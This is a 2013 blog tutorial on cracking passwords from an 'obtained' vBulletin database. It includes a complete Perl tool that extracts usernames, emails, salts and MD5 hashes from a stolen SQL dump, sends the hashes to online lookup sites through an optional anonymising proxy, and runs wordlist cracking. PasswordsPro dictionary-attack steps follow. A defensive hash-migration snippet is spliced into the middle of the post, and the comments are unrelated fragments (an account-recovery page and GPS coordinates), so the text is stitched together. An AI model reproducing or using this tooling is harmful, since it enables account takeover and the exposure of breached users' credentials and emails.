Tuesday, 24 September 2013

Cracking SQL Database

So, you have "obtained" a database of some kind, and you want to pull the passwords out of it. In this tutorial we will assume the passwords are stored as MD5 hashes and that this is a vbull database.

First, you need to extract the usernames/MD5s/salts/emails from the database. I'll go ahead and assume that since you are VIP, you already have ActivePerl installed and understand how to run Perl exploits/scripts. We will use a Perl script to extract these things from the .sql file.




Quote:

#!/usr/bin/perl
use strict;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
my $ua = LWP::UserAgent->new(agent=>'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.5');
push @{$ua->requests_redirectable}, "POST";
my $proxy = ""; #Slip a lil CGI proxy like anonymouse in here if you want for the md5 lookups
#email regex stolen from regexp to only allow for formally valid email addresses
sub tchomp { #From the module Text::Chomp
my $text = shift;
$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;
return $text;
}

sub getreq($){
my($url,$request,$myrequest);
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$myrequest = $ua->request($request);
if($myrequest->is_success){
return $myrequest->content;
}
else{
print "\n[e] Connection error - " . $myrequest->status_line . "\n";
return 0;
}
}

sub postreq($$){
my($url,$postcontent,$request,$myrequest);
$url = $_[0];
$postcontent = $_[1];
$request = HTTP::Request->new(POST => $url);
$request->content_length(length($postcontent));
$request->content_type('application/x-www-form-urlencoded');
$request->content($postcontent);
$myrequest = $ua->request($request);
if($myrequest->is_success){
return $myrequest->content;
}
else{
print "\n[e] Connection error - " . $myrequest->status_line . "\n";
return 0;
}
}


sub getcracked($){
my($hash,$cracked,%h_sites,%h_regexes,$key,$content);
$hash = $_[0];
$cracked = 0;
$h_sites{"alimamed.pp.ru"} = "md5/?md5e=&md5d=$hash";
$h_sites{"md5.rednoize.com"} = "?p&s=md5&q=$hash";
$h_sites{"gdataonline.com"} = "qkhash.php?mode=txt&hash=$hash";
$h_sites{"ice.breaker.free.fr"} = "md5.php?hash=$hash";
$h_sites{"md5.xpzone.de"} = "?string=$hash&mode=decrypt";
$h_sites{"us.md5.crysm.net"} = "find?md5=$hash";
$h_regexes{"alimamed.pp.ru"} = "<b>(.+)<\/b><br>";
$h_regexes{"md5.rednoize.com"} = "(.+)";
$h_regexes{"gdataonline.com"} = "<b>(.+)<\/b><\/td><\/tr>";
$h_regexes{"ice.breaker.free.fr"} = "<b><br><br> - (.+)<br><br><br>";
$h_regexes{"md5.xpzone.de"} = "Code: <b>(.+)<\/b><br>";
$h_regexes{"us.md5.crysm.net"} = "<li>(.+)</li><li></li>";
foreach $key(keys %h_sites){
print "[+] CHECKING\tSITE: $key\n";
if($cracked==1){
last;
}
else{
$content = &getreq($proxy."http://$key/$h_sites{$key}");
if($content =~ m/$h_regexes{$key}/i){
if(md5_hex($1) eq $hash){
print "[+] Found match $hash - $1\n\n";
return $1;
$cracked=1;
}
}
}
}
if($cracked==0){
return &postcracked($hash);
}
}

sub postcracked{
my($hash,$cracked,%h_sites,$key,$content,$con,$fhash,%h_regexes,%h_posts);
$hash = $_[0];
$cracked = 0;
$h_sites{"hashkiller.com/crack/"}="md5_crack=$hash&submit=Crack";
$h_sites{"milw0rm.com/cracker/search.php"} = "hash=$hash&Submit=Submit";
$h_sites{"md5decrypter.com/"} = "hash=$hash&submit=Decrypt%21";
$h_sites{"hashreverse.com/index.php?action=view"} = "hash=$hash&Submit2=Search+for+a+SHA1+or+MD5+hash";
$h_sites{"securitystats.com/tools/hashcrack.php"} = "inputhash=$hash&type=MD5&Submit=Submit";
$h_sites{"hashchecker.com/index.php"} = "search_field=$hash&Submit=search";
$h_sites{"md5crack.it-helpnet.de/index.php?op=search"} = "md5=$hash";
$h_regexes{"hashkiller.com/crack/"} = "<legend>Password:<\/legend>\n(.+)<br>";
$h_regexes{"milw0rm.com/cracker/search.php"} = "<TR class=\"submit\"><TD align=\"middle\" nowrap=\"nowrap\" width=90>md5<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=250>$hash<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>(.*?)<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked<\/TD><\/TR>";
$h_regexes{"md5decrypter.com/"} = "<b class='red'>Normal Text: <\/b>(.*?)\n<br\/><br\/>";
$h_regexes{"hashreverse.com/index.php?action=view"} = "Following results were found:<br><ul><li>(.*?)<\/li><\/ul>";
$h_regexes{"securitystats.com/tools/hashcrack.php"} = "<BR>$hash = (.*?)<\/td>";
$h_regexes{"hashchecker.com/index.php"} = "<li>$hash is <b>(.*?)<\/b>";
$h_regexes{"md5crack.it-helpnet.de/index.php?op=search"} = "<td>$hash<\/td><td>(.*?)<\/td><\/tr><\/table>";
foreach $key(keys %h_sites){
if($cracked==1){
last;
}
else{
print "[+] CHECKING\tSITE: $key\n";
$content = &postreq($proxy."http://$key",$h_sites{$key});
if($content =~ m/$h_regexes{$key}/i){
$fhash = $1;
if(md5_hex($fhash) eq $hash){
print "[+] Found match $hash - $fhash\n\n";
return $fhash;
$cracked=1;
}
}
}
}
if($cracked==0){
return 0;
}
}

sub e{
print "
Email extractor\t\t -E
Arguments:
<File>\tFile you want emails from
<File>\tFile to dump the emails to
E.G.: DbCrackingKit.pl -E dump-gamers.sql gamers-emails.txt
------------------------------------------------------------------------\n";
}

sub h{
print "
MD5 lookups\t\t -H
Arguments:
<File>\tFile of whatever:hashes (username:email:whatever:HASH)
<File>\tFile to dump cracked hashes to
<File>\tFile to dump uncracked hashes to, for further cracking with other wordlists/methods
E.G.: DbCrackingKit.pl -H gamerdump.txt gamer-cracked.txt gamer-uncracked.txt
------------------------------------------------------------------------\n";
}

sub d{
print "
Database extractor\t -D
Arguments:
<database>\tDumped database
<prefix>\tPrefix of the table you\'re extracting from
<columns>\tNumbers of the columns you want, seperate by commas
<delimiter>\tWhat to split the resulting data by.
\t\tIf you want spaces then enclose with quotes
<resultfile>\tFile to dump the extracted data to\n
E.G.: DbCrackingKit.pl -D dump-gamers.sql e107-users 2,5 : gamerdump.txt
------------------------------------------------------------------------\n";
}

sub w{
print "
MD5 wordlist cracker\t -W
Arguments:
<File>\tFile of whatever:hashes (e.g username:email:password:HASH)
<File>\tWordlist to crack with
<File>\tFile to dump cracked hashes
<File>\tFile to dump uncracked hashes, for further cracking
E.G.: DbCrackingKit.pl -W gamerdump.txt mil-dic.txt gamer_cracked.txt gamer_uncracked.txt
------------------------------------------------------------------------\n";
}

if($ARGV[0] eq "-D"){
&d;exit unless @ARGV==6;
my($sir,$db_database,$db_prefix,$db_columns,$db_delim,$db_dump,@db_full,@db_columns,@db_columndata,$line,$d,$x,$realnum) = (@ARGV);
@db_columns = split(/,/,$db_columns);
print "Db: $db_database\nPrefix: $db_prefix\nColumns: $db_columns\nDelimiter: $db_delim\nResult: $db_dump\n";
print "[+] Just wait, loading $db_database";
open("xfile", "<$db_database") || die "Couldn\'t open $db_database\n";
@db_full = <xfile>;
close("xfile");
print " - finished\n";
foreach $line(@db_full){
$line = &tchomp($line);
if($line =~ s/INSERT INTO (\'|\`|)$db_prefix(\'|\`|)(.+)/INSERT INTO \`$db_prefix\`$3/i){
@db_columndata = split(/\'/,$line);
$d=1;
open(DBLOG,">>$db_dump") || die "[-] Couldn't open $db_dump\n";
for($x=0;$x<=$#db_columns;$x++){
$realnum = $db_columns[$x]*2-1;
if($x==$#db_columns){
print "$db_columndata[$realnum]\n";
print DBLOG "$db_columndata[$realnum]\n";
}
else{
print "$db_columndata[$realnum]$db_delim";
print DBLOG "$db_columndata[$realnum]$db_delim";
}
}
}
}
close(DBLOG);
if($d){
print "[+] Parsing & dumping completed\n";
}
else{
print "[-] No data was extracted\n";
}
}
elsif($ARGV[0] eq "-E"){
&e;exit unless @ARGV==3;
my($sir,$efile,$edump,$line,@emails) = (@ARGV);
print "[+] Extracting emails from $efile\n";
open("xfile", "<$efile") || die "Couldn't open $efile\n";
while($line = <xfile>){
$line = &tchomp($line);
open(ELOG,">>$edump") || die "[-] Couldn't open $edump\n";
while($line=~m/([a-z_\-.0-9]+@[a-z_\-.0-9]+)/ig){
print "[E] $1\n";
print ELOG "$1\n";
}
}
close("xfile");
close(ELOG);
}
elsif($ARGV[0] eq "-H"){
&h;exit unless @ARGV==4;
my($sir,$hashes,$dump,$uncracked,$c,$u,$line,$cracky,$hashn) = (@ARGV);
$c=0;
$u=0;
open("xfile", $hashes) || die "Couldn't open $hashes\n";
while($line = <xfile>){
$line = &tchomp($line);
if($line =~ m/^(.+):([a-f0-9]{32})$/i){ # $1 = everything before the hash, $2 = the 32-hex MD5
$hashn++;
print "[+] Attempting lookup on $2\n";
$cracky = &getcracked($2);
if($cracky){
$c++;
open(LOG,">>$dump") || die("Couldn't open $dump\n");
print LOG "$1:$cracky\n";
close(LOG);
}
else{
$u++;
print "[-] Didn't find match\n";
open(LOG,">>$uncracked") || die("Couldn't open $uncracked\n");
print LOG "$line\n";
close(LOG);
}
}
else{
print "[-] $line doesn't match whatever:md5\n";
}
}
close("xfile");
if($hashn){
print "\n############################################################\n";
print "[+] Statistics:\n\t[+] Hashes attempted: $hashn\n";
print "\t[+] Hashes cracked: $c - " . int($c/$hashn*100+(.5)) . "%\n";
print "\t[+] Hashes not cracked: $u - " . int($u/$hashn*100+(.5)) ."%\n";
print "############################################################\n";
}
}
elsif($ARGV[0] eq "-W"){
&w;exit unless @ARGV==5;
my($sir,$hashesl,$wordlist,$crackedl,$uncrackedl,$c,$hashn,$line,$whatever,$hash,$word,$cracked) = (@ARGV);
$c=0;
open("userfile", $hashesl) || die("Couldn't open $hashesl\n");
while($line = <userfile>){
$line = &tchomp($line);
if($line =~ m/^(.+):([a-f0-9]{32})$/i){ # $1 = everything before the hash, $2 = the 32-hex MD5
$cracked=0;
$whatever = $1;
$hash = $2;
$hashn++;
print "[+] Attempting $hash\n";
open("wordlist",$wordlist) || die("Couldn't open $wordlist\n");
while($word = <wordlist>){
$word = &tchomp($word);
if(md5_hex($word) eq $hash){
print "[+] Cracked - " . md5_hex($word) . " : $word\n";
open(LOG,">>$crackedl") || die("Couldn't open $crackedl\n");
print LOG "$whatever:$word\n";
close(LOG);
$cracked=1;
$c++;
last;
}
}
close("wordlist");
if($cracked==0){
open(LOG,">>$uncrackedl") || die("Couldn't open $uncrackedl\n");
print LOG "$line\n";
close(LOG);
}
}
}
close("userfile");
if($hashn){
print "\n############################################################\n";
print "[+] Statistics:\n\t[+] Hashes attempted: $hashn\n";
print "\t[+] Hashes cracked: $c - " . int($c/$hashn*100+(.5)) . "%\n";
print "\t[+] Hashes not cracked: " . ($hashn-$c) . " - " . int(($hashn-$c)/$hashn*100+(.5)) ."%\n";
print "############################################################\n";
}
}
else{
&d;&e;&h;&w;exit;
}




To use the script, save it as a .pl file in C:\Perl\bin (as database.pl), and move the database into that directory as well. Open a command prompt, type cd c:\perl\bin, then type the script name, database.pl. This will show you how to use the script. We will use the -D switch.

An example of the full command you would enter might be:


Quote:

database.pl -D yourdatabase.sql vbul_users 7,47,4,9 : dumped.txt

or basically

Code:
script name.pl -D <database> <prefix of the tables you're extracting from> <numbers of the columns you want> <delimiter (what separates them in the resulting file)> <resulting file>


So, now you should have dump.txt. Open the dumped file and make sure it looks like username:MD5:salt:email. Once you have confirmed this, you are ready to import it into the actual cracking software. Today we will use PasswordsPro. Search Google for PasswordsPro yourself.

After downloading, extract it and open the program. Now we need to import the hashing modules. Go to Service -> Options -> Hashing modules -> (right-click) Add... -> then browse to the \passwordspro\Modules directory, highlight all the modules and click Open. Back in Options, click Dictionaries and import them the same way you did the modules, but from the \passwordspro\Dictionaries directory. (You can put your own password lists in this location and import them too.)

Now go to File -> Import and find the .txt dump you created earlier. You will then be asked what type of hash the file contains. If this is a vbull database, choose md5($pass.$salt) [PHP]. Once it is loaded you are ready to start the dictionary attack on the MD5s. If you don't plan on cracking forever, I suggest you save now, because it will be faster to open the .hash file later than to import the database again. Now go to Audit -> Wikipedia Dictionary Attack, then Audit -> Start attack, and watch as it runs through your dictionaries, creating an MD5 of each password in the dictionary and comparing it to the MD5s you loaded into PWP. If they match, you have cracked the password! When you get tired of cracking, stop the attack and save. Then go to File -> Export and output a text file of the cracked passwords.
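The dictionary attack described above is cheap because each guess costs a single MD5. The following is an added example (not part of the original post, and not vBulletin's or PasswordsPro's code) of how a site owner can retire such hashes without knowing the passwords: each stored MD5 from a username:MD5:salt:email export is wrapped in PBKDF2, and logins are verified against the wrapped value. The function names, the `pbkdf2-md5` record format, the iteration count and the sample rows are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import re

MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")
ITERATIONS = 600_000  # assumed work factor; tune to your hardware


def legacy_md5(password: str, salt: str) -> str:
    """md5($pass.$salt), the hash type the post selects for this dump."""
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def wrap(md5_hex: str) -> str:
    """Wrap a stored MD5 in PBKDF2 so the fast hash is no longer kept at rest."""
    wrap_salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", md5_hex.lower().encode(), wrap_salt, ITERATIONS)
    return f"pbkdf2-md5${ITERATIONS}${wrap_salt.hex()}${dk.hex()}"


def verify(password: str, legacy_salt: str, stored: str) -> bool:
    """Login check against a wrapped record: recompute the MD5, then the KDF."""
    _scheme, iters, wrap_salt, expected = stored.split("$")
    inner = legacy_md5(password, legacy_salt).encode()
    dk = hashlib.pbkdf2_hmac("sha256", inner, bytes.fromhex(wrap_salt), int(iters))
    return hmac.compare_digest(dk.hex(), expected)


def migrate(lines):
    """Return ({user: record}, [rejected rows]) for username:MD5:salt:email rows."""
    migrated, rejected = {}, []
    for raw in lines:
        row = raw.strip()
        # Split from both ends so a ':' inside the salt does not shift fields.
        user, _, rest = row.partition(":")
        md5_hex, _, rest = rest.partition(":")
        salt, _, email = rest.rpartition(":")
        if not (user and email and MD5_HEX.match(md5_hex)):
            rejected.append(row)  # not a legacy MD5 row; review by hand
            continue
        migrated[user] = {"legacy_salt": salt, "email": email, "hash": wrap(md5_hex)}
    return migrated, rejected


# Constructed sample rows (not real data).
SAMPLE = [
    "alice:" + legacy_md5("correct horse", "a:Z") + ":a:Z:alice@example.test",
    "bob:not-a-hash:xyz:bob@example.test",
]
```

After migration the bare MD5 column can be dropped; a record can later be re-hashed directly from the password at the user's next successful login.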

3 comments:

  1. Call the phone on file ••••-••••-••16
    Unavailable because of too many attempts. Please try again later.
    Confirm recovery phone number
    Get help
    Help Privacy Terms

  2. this is its coordinate position 2°33'33.9"S 120°48'41.3"E
    -2.559423, 120.811468

  3. THIS IS WHERE THAT ITEM IS NOW TONIGHT 2°41'58.6"S 121°08'27.0"E
    -2.699599, 121.140840